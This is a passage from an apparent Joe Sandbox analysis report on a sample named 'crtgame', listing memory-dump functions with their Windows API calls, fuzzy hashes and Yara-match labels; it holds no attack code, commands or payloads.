Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
String ID:
API String ID: 1518410164-0
Opcode ID: 037ac45e0582e41718e11ba5c0801b7d6bb9f605c26f2f63663a9b798439dd13
Instruction ID: adb526ed5bbd01a5d3ebe2789c010903331fbd02228c162396d34d4d7792041d
Opcode Fuzzy Hash: 037ac45e0582e41718e11ba5c0801b7d6bb9f605c26f2f63663a9b798439dd13
Instruction Fuzzy Hash: 86019270214616AFD708DF59D885F55FBA9FF84320B10835AE928872C0EF70E925CBA0

Function 02C69978 Relevance: 1.5, APIs: 1, Instructions: 37fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE ref: 02C7775A

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C5A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c5a000_crtgame.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8f753af6b35742c44bab170ecc561df0315d910a76e1762a92a0620755078c9c
Instruction ID: b2afb38e16b5a32f2d26632d6aef0fd0db947c77f88ebfa62222c4d393a84740
Opcode Fuzzy Hash: 8f753af6b35742c44bab170ecc561df0315d910a76e1762a92a0620755078c9c
Instruction Fuzzy Hash: 68F014B140C7089BD3127F0AD88937AB7E4AB44701F41482CD6C203601EA31A8048A9B

Function 02C2DEF0 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C2DEF5

Part of subcall function 02C226DB: RtlEnterCriticalSection.NTDLL(?), ref: 02C22706
Part of subcall function 02C226DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02C2272B
Part of subcall function 02C226DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C45583), ref: 02C22738
Part of subcall function 02C226DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02C22778
Part of subcall function 02C226DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02C227D9

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
String ID:
API String ID: 4293676635-0
Opcode ID: 582e1501677389c53df2e8096caecc0919ea9b2436e8d1f8db5d1ff154135e8d
Instruction ID: 411ecc0c7a439bb0d46cb6be0e75248094df074f24c8ac271ee70ea2e1f93395
Opcode Fuzzy Hash: 582e1501677389c53df2e8096caecc0919ea9b2436e8d1f8db5d1ff154135e8d
Instruction Fuzzy Hash: 4D01D0B1900B048FC328CF0AC640946FFF5FF88710B11C5AE944A8B721EB70AA40CF94

Function 02C7DFD8 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 02C7E012

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C5A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c5a000_crtgame.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b7e48c3b9bbb5f9db7811adea5cabdf83f405578bdd43423ad6698c7d77a596f
Instruction ID: 718f42e02828f173762738c91453b091cbf49efc448bdd3c8bf09a1aa4c66ecb
Opcode Fuzzy Hash: b7e48c3b9bbb5f9db7811adea5cabdf83f405578bdd43423ad6698c7d77a596f
Instruction Fuzzy Hash: 57E04FF290C6149FE7117A589C417BDB7D4DF04220F06453DD7C893640E536540086CB

Function 02C64F43 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathA.SHELL32 ref: 02C7B90E

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C5A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C5A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c5a000_crtgame.jbxd

Similarity

API ID: FolderPathSpecial
String ID:
API String ID: 994120019-0
Opcode ID: de9bfb89cb552b2d5cef18ff0eb21b0a516178cd92495e5fa954be3285fbba33
Instruction ID: 901a4288b203b0d02900da4319a64d7152bcdbc8e7a0a137f9367ddcd21da56f
Opcode Fuzzy Hash: de9bfb89cb552b2d5cef18ff0eb21b0a516178cd92495e5fa954be3285fbba33
Instruction Fuzzy Hash: EEE01AB054C70CCFE3107EA9DC8A32AB7A4AB14701F05081DC7E203241FA316A14DA9B

Function 02C2DCCF Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C2DCD4

Part of subcall function 02C3356D: _malloc.LIBCMT ref: 02C33585

Part of subcall function 02C2DEF0: __EH_prolog.LIBCMT ref: 02C2DEF5

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: H_prolog$_malloc
String ID:
API String ID: 4254904621-0
Opcode ID: d2a4cbf19f52a8b089827d57d85c3257517afc7cf4cd8be5f9ee2148d3da3c03
Instruction ID: 12fd8d3479e42d74bf24f4b85ac1d45c104a8045dea3f76b43c7437f23624dc9
Opcode Fuzzy Hash: d2a4cbf19f52a8b089827d57d85c3257517afc7cf4cd8be5f9ee2148d3da3c03
Instruction Fuzzy Hash: 1FE0C271A00185AFDF0DDFA8D80076FB7A2EB54300F1046AEB80AE7640DF718A009A81

Function 02C32E72 Relevance: 1.5, APIs: 1, Instructions: 19COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02C3567A: __getptd_noexit.LIBCMT ref: 02C3567B
Part of subcall function 02C3567A: __amsg_exit.LIBCMT ref: 02C35688

Part of subcall function 02C32EB3: __getptd_noexit.LIBCMT ref: 02C32EB7
Part of subcall function 02C32EB3: __freeptd.LIBCMT ref: 02C32ED1
Part of subcall function 02C32EB3: RtlExitUserThread.NTDLL(?,00000000,?,02C32E93,00000000), ref: 02C32EDA

__XcptFilter.LIBCMT ref: 02C32E9F

Part of subcall function 02C387B4: __getptd_noexit.LIBCMT ref: 02C387B8

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
String ID:
API String ID: 1405322794-0
Opcode ID: 9a0a9f47854afeae931929786d85e5669722c28d9e0460847d5e0f0e44082a64
Instruction ID: a3fd409390737941a9157d7d24005512f0bbec815e659a895d26a879099b9999
Opcode Fuzzy Hash: 9a0a9f47854afeae931929786d85e5669722c28d9e0460847d5e0f0e44082a64
Instruction Fuzzy Hash: 16E0ECB2904600AFEB09BBA0D949F2D77B6AF05701F200949F5019B2A0DAB5AD40AE21

Function 02C31B80 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 02C31030: OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02C310D0
Part of subcall function 02C31030: CloseHandle.KERNEL32(00000000), ref: 02C310E5
Part of subcall function 02C31030: ResetEvent.KERNEL32(00000000), ref: 02C310EF
Part of subcall function 02C31030: CloseHandle.KERNEL32(00000000,AC2FC4E2), ref: 02C31124

TlsSetValue.KERNEL32(00000025,?), ref: 02C31BCA

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$OpenResetValue
String ID:
API String ID: 1556185888-0
Opcode ID: c6cb7f355cc83f313d6a4b7163cc6ac8e82e3f4d98281130e7c1db7643f1667b
Instruction ID: cf60fd443e0a2027cdd2652142e828f63c519779d1f531f563001777706a4a52
Opcode Fuzzy Hash: c6cb7f355cc83f313d6a4b7163cc6ac8e82e3f4d98281130e7c1db7643f1667b
Instruction Fuzzy Hash: 9B018F72A40254AFD700CF59D845B5ABBACFB457B0F144B6AF829E3680D771A9008AA4

Non-executed Functions

Function 02C302E0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 179windowCOMMON

Download Yara Rule

APIs

Part of subcall function 02C29478: __EH_prolog.LIBCMT ref: 02C2947D
Part of subcall function 02C29478: _Allocate.LIBCPMT ref: 02C294D4

FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02C303C2
GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02C303CA

Strings

Unknown error, xrefs: 02C30419
invalid string position, xrefs: 02C30516

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: AllocateErrorFormatH_prologLastMessage
String ID: Unknown error$invalid string position
API String ID: 58466617-1837348584
Opcode ID: b3b5e5c5ee0e12836384cb3c63e26baf954432bd95cc41789f13266d20dce060
Instruction ID: e5f9917c7c714776d6fcf94cd75ce433edcaf4470d1a9e063bf660f768c19b7f
Opcode Fuzzy Hash: b3b5e5c5ee0e12836384cb3c63e26baf954432bd95cc41789f13266d20dce060
Instruction Fuzzy Hash: 7751CB71608341CFE715CF24C880B2FBBE4AB88358F500D2DF48697292DB71E688CB92

Function 02C38F48 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,02C348B6,?,?,?,00000001), ref: 02C38F4D
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02C38F56

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 547bfb5df3f506e4113eb18a65570c636a9ae72e2fa57b1e4d391d3cc364bfad
Instruction ID: c32ced0ff370891aeafe4db2ac49568fab965ce044387a600010bb3a32f72d7f
Opcode Fuzzy Hash: 547bfb5df3f506e4113eb18a65570c636a9ae72e2fa57b1e4d391d3cc364bfad
Instruction Fuzzy Hash: C0B09239486208EBCB012F91FC0DB8ABFA8EB04662F004950F60E440618B7264289AE2

Function 02C224E1 Relevance: 21.2, APIs: 14, Instructions: 173COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C224E6
InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02C224FC
RtlEnterCriticalSection.NTDLL(?), ref: 02C2250E
RtlLeaveCriticalSection.NTDLL(?), ref: 02C2256D
SetLastError.KERNEL32(00000000,?,74DEDFB0), ref: 02C2257F
GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,74DEDFB0), ref: 02C22599
GetLastError.KERNEL32(?,74DEDFB0), ref: 02C225A2
InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C225F0
InterlockedDecrement.KERNEL32(00000002), ref: 02C2262F
InterlockedExchange.KERNEL32(00000000,00000000), ref: 02C2268E
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C22699
InterlockedExchange.KERNEL32(00000000,00000001), ref: 02C226AD
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,74DEDFB0), ref: 02C226BD
GetLastError.KERNEL32(?,74DEDFB0), ref: 02C226C7

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
String ID:
API String ID: 1213838671-0
Opcode ID: 19a4c68a77857c2b70c5eb674214b8fc2d5b259b456b05f3ce3a24e7c541e5b4
Instruction ID: f3d3af1340656109ffe743dfca3878847bb4f33b243cc7ef3b7e9d0fc832e2c7
Opcode Fuzzy Hash: 19a4c68a77857c2b70c5eb674214b8fc2d5b259b456b05f3ce3a24e7c541e5b4
Instruction Fuzzy Hash: 80613376901219DFCB21DFA4D584AAEFBF9FF48310F104569E946E3240DB34AA58CFA1

Function 02C2452E Relevance: 19.9, APIs: 13, Instructions: 442networkCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C24533

Part of subcall function 02C3356D: _malloc.LIBCMT ref: 02C33585

htons.WS2_32(?), ref: 02C24594
htonl.WS2_32(?), ref: 02C245B7
htonl.WS2_32(00000000), ref: 02C245BE
htons.WS2_32(00000000), ref: 02C24672
_sprintf.LIBCMT ref: 02C24688
htons.WS2_32(?), ref: 02C245DB

Part of subcall function 02C290D6: __EH_prolog.LIBCMT ref: 02C290DB
Part of subcall function 02C290D6: RtlEnterCriticalSection.NTDLL(00000020), ref: 02C29156
Part of subcall function 02C290D6: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C29174

Part of subcall function 02C21BA7: __EH_prolog.LIBCMT ref: 02C21BAC
Part of subcall function 02C21BA7: RtlEnterCriticalSection.NTDLL ref: 02C21BBC
Part of subcall function 02C21BA7: RtlLeaveCriticalSection.NTDLL ref: 02C21BEA
Part of subcall function 02C21BA7: RtlEnterCriticalSection.NTDLL ref: 02C21C13
Part of subcall function 02C21BA7: RtlLeaveCriticalSection.NTDLL ref: 02C21C56

Part of subcall function 02C2D892: __EH_prolog.LIBCMT ref: 02C2D897

htonl.WS2_32(?), ref: 02C248A7
htonl.WS2_32(00000000), ref: 02C248AE
htonl.WS2_32(00000000), ref: 02C248F3
htonl.WS2_32(00000000), ref: 02C248FA
htons.WS2_32(?), ref: 02C2491A
htons.WS2_32(?), ref: 02C24924

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_sprintf
String ID:
API String ID: 725951905-0
Opcode ID: 73eb9d2a346a609f2aebfd41f96e8d771b7265d76c351a1b545ffb7676c24cf7
Instruction ID: 7177abb7e287af50bb4b4454ebfc23f6517f3bcb4bb96bebe24c988b31e1d1fe
Opcode Fuzzy Hash: 73eb9d2a346a609f2aebfd41f96e8d771b7265d76c351a1b545ffb7676c24cf7
Instruction Fuzzy Hash: 59023971D00269EFDF25DFA4D844BEEBBB9AF08304F10459AE505B7280DBB45A48DFA1

Function 02C23423 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 94libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02C23428
GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02C2346B
GetProcAddress.KERNEL32(00000000), ref: 02C23472
GetLastError.KERNEL32 ref: 02C23486
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02C234D7
RtlEnterCriticalSection.NTDLL(00000018), ref: 02C234ED
RtlLeaveCriticalSection.NTDLL(00000018), ref: 02C23518

Strings

CancelIoEx, xrefs: 02C23461
KERNEL32, xrefs: 02C23466

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
String ID: CancelIoEx$KERNEL32
API String ID: 2902213904-434325024
Opcode ID: 1ceff6280f2335611674401108800bf0217ad51a370f6e29af17d40061554b77
Instruction ID: 31198c0bb4d770b77e14417e8ac55a9f15d79ef96f3d9e18fbbb5f6f229e385d
Opcode Fuzzy Hash: 1ceff6280f2335611674401108800bf0217ad51a370f6e29af17d40061554b77
Instruction Fuzzy Hash: EF318FB6900355DFDB119F64D84476ABBF9FF88311F0089EAE8059B240DB74D905CFA1

Function 02C31030 Relevance: 10.6, APIs: 7, Instructions: 132COMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02C310D0
CloseHandle.KERNEL32(00000000), ref: 02C310E5
ResetEvent.KERNEL32(00000000), ref: 02C310EF
CloseHandle.KERNEL32(00000000,AC2FC4E2), ref: 02C31124
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,AC2FC4E2), ref: 02C3119A
CloseHandle.KERNEL32(00000000), ref: 02C311AF

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateOpenReset
String ID:
API String ID: 1285874450-0
Opcode ID: e4605e9ed5b29351420202531ae161e9f7fd791d27e30f06d1ace3d5fa895f9c
Instruction ID: d70c83c7de9c3ff87e1ffd4a5a94bdf258aa40558719ae843b66006fcf13cf78
Opcode Fuzzy Hash: e4605e9ed5b29351420202531ae161e9f7fd791d27e30f06d1ace3d5fa895f9c
Instruction Fuzzy Hash: DC414E74D00358AFDF21CFE5CC44BAEB7B8AF45724F184A19E819EB280D7B49A05CB91

Function 02C22081 Relevance: 10.6, APIs: 7, Instructions: 116timeCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,00000001), ref: 02C220AC
SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02C220CD
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C220D8
InterlockedDecrement.KERNEL32(?), ref: 02C2213E
GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02C2217A
InterlockedDecrement.KERNEL32(?), ref: 02C22187
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C221A6

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
String ID:
API String ID: 1171374749-0
Opcode ID: ecb4be55c0c696e197b0fa1b3244cb6a0a28c41c7a67f1286016f0074981aee7
Instruction ID: 7a7708d6a5f3db75509fc650797d3cd4a170d4b3cec63078299299aa0c1c9c6d
Opcode Fuzzy Hash: ecb4be55c0c696e197b0fa1b3244cb6a0a28c41c7a67f1286016f0074981aee7
Instruction Fuzzy Hash: 764128755047119FC321DF25D884A6BBBF9FFD8654F004A1EF89682650DB30EA09CFA2

Function 02C31142 Relevance: 10.6, APIs: 7, Instructions: 107synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 02C318F0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02C3114E,?,?), ref: 02C3191F
Part of subcall function 02C318F0: CloseHandle.KERNEL32(00000000,?,?,02C3114E,?,?), ref: 02C31934
Part of subcall function 02C318F0: SetEvent.KERNEL32(00000000,02C3114E,?,?), ref: 02C31947

OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02C310D0
CloseHandle.KERNEL32(00000000), ref: 02C310E5
ResetEvent.KERNEL32(00000000), ref: 02C310EF
CloseHandle.KERNEL32(00000000,AC2FC4E2), ref: 02C31124
__CxxThrowException@8.LIBCMT ref: 02C31155

Part of subcall function 02C33F7A: RaiseException.KERNEL32(?,?,?,02C50F6C,?,00000400,?,?,?,02C335BD,?,02C50F6C,00000000,00000001), ref: 02C33FCF

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,AC2FC4E2), ref: 02C3119A
CloseHandle.KERNEL32(00000000), ref: 02C311AF

Part of subcall function 02C31630: GetCurrentProcessId.KERNEL32(?), ref: 02C31689

WaitForSingleObject.KERNEL32(00000000,000000FF,AC2FC4E2), ref: 02C311BF

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
String ID:
API String ID: 2227236058-0
Opcode ID: 1697f86826fd12de876d0a30fc5ac33a76be648649da64265ee9ed0717c438d4
Instruction ID: 3bbb80cd0ecece3f46cb078af95f883f17bb61836ee69bd4c068526823510212
Opcode Fuzzy Hash: 1697f86826fd12de876d0a30fc5ac33a76be648649da64265ee9ed0717c438d4
Instruction Fuzzy Hash: D9319371E003489FDF22CBE4DC44BADB7B8AF45314F184A19E81CEB280D7B09A05CBA1

Function 02C357B4 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 02C357B4

Part of subcall function 02C37F22: RtlEncodePointer.NTDLL(00000000), ref: 02C37F25
Part of subcall function 02C37F22: __initp_misc_winsig.LIBCMT ref: 02C37F40
Part of subcall function 02C37F22: GetModuleHandleW.KERNEL32(kernel32.dll,?), ref: 02C38CA1
Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02C38CB5
Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02C38CC8
Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02C38CDB
Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02C38CEE
Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02C38D01
Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02C38D14
Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02C38D27
Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02C38D3A
Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02C38D4D
Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02C38D60
Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02C38D73
Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02C38D86
Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02C38D99
Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02C38DAC
Part of subcall function 02C37F22: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02C38DBF

__mtinitlocks.LIBCMT ref: 02C357B9
__mtterm.LIBCMT ref: 02C357C2

Part of subcall function 02C3582A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02C38358
Part of subcall function 02C3582A: RtlDeleteCriticalSection.NTDLL(02C53978), ref: 02C38381

__calloc_crt.LIBCMT ref: 02C357E7
__initptd.LIBCMT ref: 02C35809
GetCurrentThreadId.KERNEL32 ref: 02C35810

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
String ID:
API String ID: 1500305132-0
Opcode ID: 8ef82b0d0c355e10d9d83d8c29d2186d78216821a8ef13d7878d212af72ee8f1
Instruction ID: a11e6efdf669665121d05d430b41f9dbd280d910d72a51c5823714bae3a40e63
Opcode Fuzzy Hash: 8ef82b0d0c355e10d9d83d8c29d2186d78216821a8ef13d7878d212af72ee8f1
Instruction Fuzzy Hash: 76F024325A97515AE6373AB47C0138A2BC6EF06BF0BA00F29F450D60C1FF11D4411991

Function 02C32EE1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02C32E93,00000000), ref: 02C32EFB
GetProcAddress.KERNEL32(00000000), ref: 02C32F02
RtlEncodePointer.NTDLL(00000000), ref: 02C32F0E
RtlDecodePointer.NTDLL(00000001), ref: 02C32F2B

Strings

RoInitialize, xrefs: 02C32EEA
combase.dll, xrefs: 02C32EF6

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 6589038d68f424bc6f07b0ebd5bfd4e721a77ae61b45d37586d7da1f19141e5c
Instruction ID: dcdda6e0fe8f359255c29b7c60124339ba52a9f039fb6cec72368dd5e03cdc63
Opcode Fuzzy Hash: 6589038d68f424bc6f07b0ebd5bfd4e721a77ae61b45d37586d7da1f19141e5c
Instruction Fuzzy Hash: F1E01274DD0360AAFF101F70EC09B46779DAB94702FA04F24F405E1081DBB581A89F54

Function 02C32FB7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02C32ED0), ref: 02C32FD1
GetProcAddress.KERNEL32(00000000), ref: 02C32FD8
RtlEncodePointer.NTDLL(00000000), ref: 02C32FE3
RtlDecodePointer.NTDLL(02C32ED0), ref: 02C32FFE

Strings

RoUninitialize, xrefs: 02C32FC0
combase.dll, xrefs: 02C32FCC

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 7111cdbbb8e9e5f6e52a91f4054f691c797dc70cc3e2e8aea8de07a12caebbdd
Instruction ID: e51fa7edb8ce491bee340ad01fe6ca8793696e428b046eeafe58685a5a83341e
Opcode Fuzzy Hash: 7111cdbbb8e9e5f6e52a91f4054f691c797dc70cc3e2e8aea8de07a12caebbdd
Instruction Fuzzy Hash: 59E0B674DC1314ABFB605F60AD0DB567AADBB84702FA04F24F506E1094DFB890A8DB98

Function 02C31950 Relevance: 10.2, APIs: 8, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000025,AC2FC4E2,?,?,?,?,00000000,02C464E8,000000FF,02C31BEA), ref: 02C3198A
TlsSetValue.KERNEL32(00000025,02C31BEA,?,?,00000000), ref: 02C319F7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C31A21
HeapFree.KERNEL32(00000000), ref: 02C31A24

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd

Yara matches

Similarity

API ID: HeapValue$FreeProcess
String ID:
API String ID: 1812714009-0
Opcode ID: 29aa0dc458f897c490e1ec15e587dbc1bc1a4cad9162955ddce6aeeddd78e2c7
Instruction ID: f1643514f38bdcc1222e14a5871ed3aad01c2a0a14d64763b8257e6d4e4d489e
Opcode Fuzzy Hash: 29aa0dc458f897c490e1ec15e587dbc1bc1a4cad9162955ddce6aeeddd78e2c7
Instruction Fuzzy Hash: 3E519E359443449FDB22DF69C448B16BBE4EF85765F0D8E58E85D97280D7B0ED04CBA0

Function 02C450B0 Relevance: 9.3, APIs: 6, Instructions: 276COMMONLIBRARYCODE

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 02C451C0
__FindPESection.LIBCMT ref: 02C451DA

Memory Dump Source

Source File: 00000006.00000002.2945187481.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false

Joe Sandbox IDA Plugin

